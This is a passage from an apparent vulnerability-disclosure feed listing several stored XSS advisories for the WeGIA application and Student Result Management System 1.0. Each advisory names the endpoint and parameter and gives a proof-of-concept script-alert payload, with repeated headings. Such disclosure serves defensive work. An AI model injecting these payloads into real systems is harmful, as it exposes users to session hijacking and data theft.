inputs in the <code>Cadastro_Atendido.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6696/image.png" width="1896" height="977" srcset="/p/cve-2025-6696/image_hu_ffda6c40e75d1bcf.png 480w, /p/cve-2025-6696/image_hu_278d1476974e3453.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-6696/image-1.png" width="1918" height="995" srcset="/p/cve-2025-6696/image-1_hu_eda3fb9ed78bea61.png 480w, /p/cve-2025-6696/image-1_hu_c818ef974e37dd7b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/BCqqmDk0pH8" target="_blank" rel="noopener" >https://youtu.be/BCqqmDk0pH8</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6696.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6697/ https://www.cvehunters.com/p/cve-2025-6697/ <h2 id="cve-2025-6697-cross-site-scripting-xss-stored-endpoint-adicionar_tipoentradaphp-parameter-tipo">CVE-2025-6697: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipoEntrada.php</code> parameter <code>Tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6697" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6697</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipoEntrada.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_tipoEntrada.php</code></p><h2 id="cve-2025-6697-cross-site-scripting-xss-stored-endpoint-adicionar_tipoentradaphp-parameter-tipo">CVE-2025-6697: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipoEntrada.php</code> parameter <code>Tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6697" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6697</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipoEntrada.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_tipoEntrada.php</code></p> <p>Parameter: <code>Tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Tipo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6697/image.png" width="1875" height="985" srcset="/p/cve-2025-6697/image_hu_82b56e56e1511981.png 480w, /p/cve-2025-6697/image_hu_96dbb15382131ebf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-6697/image-1.png" width="1884" height="997" srcset="/p/cve-2025-6697/image-1_hu_a8c1f483e3ef6844.png 480w, /p/cve-2025-6697/image-1_hu_97a661a9facc76a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="188" data-flex-basis="453px" /></p> <p><img src="/p/cve-2025-6697/image-2.png" width="1909" height="987" srcset="/p/cve-2025-6697/image-2_hu_ca33285700be848f.png 480w, /p/cve-2025-6697/image-2_hu_6a491cc29a99a3e4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="464px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/BRqtS1octSQ" target="_blank" rel="noopener" >https://youtu.be/BRqtS1octSQ</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6697.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6698/ https://www.cvehunters.com/p/cve-2025-6698/ <h2 id="cve-2025-6698-cross-site-scripting-xss-stored-endpoint-adicionar_tiposaidaphp-parameter-tipo">CVE-2025-6698: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipoSaida.php</code> parameter <code>Tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6698" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6698</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipoSaida.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_tipoSaida.php</code></p><h2 id="cve-2025-6698-cross-site-scripting-xss-stored-endpoint-adicionar_tiposaidaphp-parameter-tipo">CVE-2025-6698: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipoSaida.php</code> parameter <code>Tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6698" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6698</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipoSaida.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_tipoSaida.php</code></p> <p>Parameter: <code>Tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_tipoSaida.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6698/image.png" width="1884" height="988" srcset="/p/cve-2025-6698/image_hu_1a5d7d99e108196e.png 480w, /p/cve-2025-6698/image_hu_b87867b672dc8af6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="457px" /></p> <p><img src="/p/cve-2025-6698/image-1.png" width="1840" height="1004" srcset="/p/cve-2025-6698/image-1_hu_f50f1b60b1eb092b.png 480w, /p/cve-2025-6698/image-1_hu_4f105eec7cbf26e6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="439px" /></p> <p><img src="/p/cve-2025-6698/image-2.png" width="1887" height="994" srcset="/p/cve-2025-6698/image-2_hu_fb4627698ac6d751.png 480w, /p/cve-2025-6698/image-2_hu_e95ed4393ffc5db8.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/7P5YT5MwCjg" target="_blank" rel="noopener" >https://youtu.be/7P5YT5MwCjg</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6699/ https://www.cvehunters.com/p/cve-2025-6699/ <h2 id="cve-2025-6699-cross-site-scripting-xss-stored-endpoint-cadastro_funcionariophp-parameter-cpf">CVE-2025-6699: Cross-Site Scripting (XSS) Stored endpoint <code>cadastro_funcionario.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6699" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6699</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/funcionario/cadastro_funcionario.php</code></p><h2 id="cve-2025-6699-cross-site-scripting-xss-stored-endpoint-cadastro_funcionariophp-parameter-cpf">CVE-2025-6699: Cross-Site Scripting (XSS) Stored endpoint <code>cadastro_funcionario.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6699" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6699</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/funcionario/cadastro_funcionario.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>cadastro_funcionario.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDBeeee'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> ;</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6699/image.png" width="1857" height="990" srcset="/p/cve-2025-6699/image_hu_353d8c63a12bb5cf.png 480w, /p/cve-2025-6699/image_hu_588c09aeb2830033.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <p><img src="/p/cve-2025-6699/image-1.png" width="1897" height="977" srcset="/p/cve-2025-6699/image-1_hu_2e98a5ecd10ad09a.png 480w, /p/cve-2025-6699/image-1_hu_cb0508422329be41.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-6699/image-2.png" width="1888" height="990" srcset="/p/cve-2025-6699/image-2_hu_b72551845a60d67a.png 480w, /p/cve-2025-6699/image-2_hu_e0f624d860a6c52d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="457px" /></p> <p><img src="/p/cve-2025-6699/image-3.png" width="1894" height="995" srcset="/p/cve-2025-6699/image-3_hu_997e017ab8448d57.png 480w, /p/cve-2025-6699/image-3_hu_87728583f92c7b21.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/1RlctPW0nhw" target="_blank" rel="noopener" >https://youtu.be/1RlctPW0nhw</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6475/ https://www.cvehunters.com/p/cve-2025-6475/ <h2 id="cve-2025-6475-cross-site-scripting-xss-stored-endpoint-students-parameter-first-name">CVE-2025-6475: Cross-Site Scripting (XSS) Stored endpoint <code>students</code> parameter <code>First Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6475" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6475</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>students</code> endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>First Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-6475-cross-site-scripting-xss-stored-endpoint-students-parameter-first-name">CVE-2025-6475: Cross-Site Scripting (XSS) Stored endpoint <code>students</code> parameter <code>First Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6475" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6475</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>students</code> endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>First Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/srms/script/admin/students</code></p> <p>Parameter: <code>First Name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>First Name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB SRMS'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6475/image.png" width="1883" height="989" srcset="/p/cve-2025-6475/image_hu_71491be5bdea0f0e.png 480w, /p/cve-2025-6475/image_hu_92cd8e49ca5dfcb1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="456px" /></p> <p><img src="/p/cve-2025-6475/image-1.png" width="1908" height="986" srcset="/p/cve-2025-6475/image-1_hu_cf4dd5bb1ea8a37b.png 480w, /p/cve-2025-6475/image-1_hu_fbd362652743b24f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="464px" /></p> <p><img src="/p/cve-2025-6475/image-2.png" width="1905" height="987" srcset="/p/cve-2025-6475/image-2_hu_3e8433f59e31d0f4.png 480w, /p/cve-2025-6475/image-2_hu_ad04074a8049b310.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/rBtUzvmoIxc" target="_blank" rel="noopener" >https://youtu.be/rBtUzvmoIxc</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 22 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6477/ https://www.cvehunters.com/p/cve-2025-6477/ <h2 id="cve-2025-6477-cross-site-scripting-xss-stored-endpoint-system-parameter-school-name">CVE-2025-6477: Cross-Site Scripting (XSS) Stored endpoint <code>system</code> parameter <code>School Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6477" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6477</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>system</code> endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>School Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-6477-cross-site-scripting-xss-stored-endpoint-system-parameter-school-name">CVE-2025-6477: Cross-Site Scripting (XSS) Stored endpoint <code>system</code> parameter <code>School Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6477" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6477</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>system</code> endpoint of the Student Result Management System 1.0 (SRMS 1.0) application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>School Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/script/admin/system</code></p> <p>Parameter: <code>School Name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>School Name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB SRMS'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6477/image.png" width="1909" height="990" srcset="/p/cve-2025-6477/image_hu_7cde227e4d03ee28.png 480w, /p/cve-2025-6477/image_hu_a896ba7965cb155.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6477/image-1.png" width="1909" height="989" srcset="/p/cve-2025-6477/image-1_hu_f09a3ad56b404d14.png 480w, /p/cve-2025-6477/image-1_hu_e0f5609d6ecb5124.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <p><img src="/p/cve-2025-6477/image-2.png" width="1887" height="1005" srcset="/p/cve-2025-6477/image-2_hu_117d198a06d18269.png 480w, /p/cve-2025-6477/image-2_hu_7046a41012ca59a3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="450px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/FhPQLGorbqA" target="_blank" rel="noopener" >https://youtu.be/FhPQLGorbqA</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md" 